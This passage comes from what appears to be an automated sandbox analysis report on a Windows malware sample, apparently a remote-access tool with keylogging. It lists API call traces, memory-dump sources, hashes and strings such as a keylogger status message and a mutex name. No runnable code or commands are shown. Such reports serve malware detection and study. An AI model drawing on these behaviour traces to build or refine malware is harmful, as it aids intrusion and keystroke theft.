                                                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                • API String ID: 782494840-2070987746
                                                                • Opcode ID: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                                • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                                • Opcode Fuzzy Hash: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                                • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                                APIs
                                                                • Sleep.KERNEL32(00001388), ref: 0040A740
                                                                  • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                  • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                  • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                  • Part of subcall function 0040A675: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
                                                                • String ID:
                                                                • API String ID: 110482706-0
                                                                • Opcode ID: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                                • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                                • Opcode Fuzzy Hash: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                                • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(1E6CC7DD), ref: 1E6CC7E6
                                                                • GetModuleHandleA.KERNEL32(?,1E6CC7DD), ref: 1E6CC838
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1E6CC860
                                                                  • Part of subcall function 1E6CC803: GetProcAddress.KERNEL32(00000000,1E6CC7F4), ref: 1E6CC804
                                                                  • Part of subcall function 1E6CC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC816
                                                                  • Part of subcall function 1E6CC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC82A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4419973071.000000001E6C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E6C0000, based on PE: true
                                                                • Associated: 00000003.00000002.4419939980.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4419973071.000000001E6D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_1e6c0000_SndVol.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2099061454-0
                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                • Instruction ID: f00c244cfe53bc5d0991bf38eef0cc09ecfc34a912b0c66950108feb05fadb0b
                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                • Instruction Fuzzy Hash: 36016410A576813CBB1C82740C15ABB6F9EDB23770B930B96E100C709FCAA0C102C3FA
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?,1E6CC7DD), ref: 1E6CC838
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1E6CC860
                                                                  • Part of subcall function 1E6CC7E6: GetModuleHandleA.KERNEL32(1E6CC7DD), ref: 1E6CC7E6
                                                                  • Part of subcall function 1E6CC7E6: GetProcAddress.KERNEL32(00000000,1E6CC7F4), ref: 1E6CC804
                                                                  • Part of subcall function 1E6CC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC816
                                                                  • Part of subcall function 1E6CC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC82A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4419973071.000000001E6C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E6C0000, based on PE: true
                                                                • Associated: 00000003.00000002.4419939980.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4419973071.000000001E6D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_1e6c0000_SndVol.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2099061454-0
                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                • Instruction ID: e7a5979bc38b991e17d6cffd99fa5c64aefc9430154c05f62e8c1394e1029253
                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                • Instruction Fuzzy Hash: DA21242241B6C26FEB158BB44C14AA77FDADB13270F5B0B96D040CB18BD6A89446C3A6
                                                                APIs
                                                                • GetProcAddress.KERNEL32(00000000,1E6CC7F4), ref: 1E6CC804
                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC816
                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC82A
                                                                • GetModuleHandleA.KERNEL32(?,1E6CC7DD), ref: 1E6CC838
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1E6CC860
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4419973071.000000001E6C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E6C0000, based on PE: true
                                                                • Associated: 00000003.00000002.4419939980.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4419973071.000000001E6D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_1e6c0000_SndVol.jbxd
                                                                Similarity
                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                • String ID:
                                                                • API String ID: 2152742572-0
                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                • Instruction ID: de372bf4af9b94c69245f3923143aed1e052052585b18f56d5ad02facd9ce1e8
                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                • Instruction Fuzzy Hash: C0F04010A8B2813CFA1942B41C54EBB6FCECA27230B920B52E100C718FC9A08506C3FA
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                • String ID: Offline Keylogger Started
                                                                • API String ID: 465354869-4114347211
                                                                • Opcode ID: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
                                                                • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                                • Opcode Fuzzy Hash: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
                                                                • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                                APIs
                                                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$EventLocalThreadTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 2532271599-1507639952
                                                                • Opcode ID: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
                                                                • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                                • Opcode Fuzzy Hash: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
                                                                • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                                                • RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 1818849710-4028850238
                                                                • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                                • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                • String ID:
                                                                • API String ID: 2579639479-0
                                                                • Opcode ID: 23c73d5540117da574f7f414a8203fc9c15f50faa32e4adc8859767a57badc70
                                                                • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                                • Opcode Fuzzy Hash: 23c73d5540117da574f7f414a8203fc9c15f50faa32e4adc8859767a57badc70
                                                                • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$ChangeCloseCreateFindNotificationSizeSleep
                                                                • String ID:
                                                                • API String ID: 4068920109-0
                                                                • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                                • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                                • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                                • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C4E5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$ChangeCloseCreateFindNotificationReadSize
                                                                • String ID:
                                                                • API String ID: 2135649906-0
                                                                • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                                • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                                • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                                • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CountEventTick
                                                                • String ID: !D@
                                                                • API String ID: 180926312-604454484
                                                                • Opcode ID: 5875e57192157b7f6268978a9899f50a85d711365e6b1f67c1b99dbde02be670
                                                                • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                                • Opcode Fuzzy Hash: 5875e57192157b7f6268978a9899f50a85d711365e6b1f67c1b99dbde02be670
                                                                • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                                APIs
                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                                • GetLastError.KERNEL32 ref: 0040D083
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateErrorLastMutex
                                                                • String ID: Rmc-TLPQMO
                                                                • API String ID: 1925916568-210927153
                                                                • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                                • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                                APIs
                                                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EventObjectSingleWaitsend
                                                                • String ID:
                                                                • API String ID: 3963590051-0
                                                                • Opcode ID: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                                • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                                                • Opcode Fuzzy Hash: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                                • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                                • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                                • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                                                • RegCloseKey.KERNEL32(?), ref: 00413592
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                                                • RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID:
                                                                • API String ID: 1818849710-0
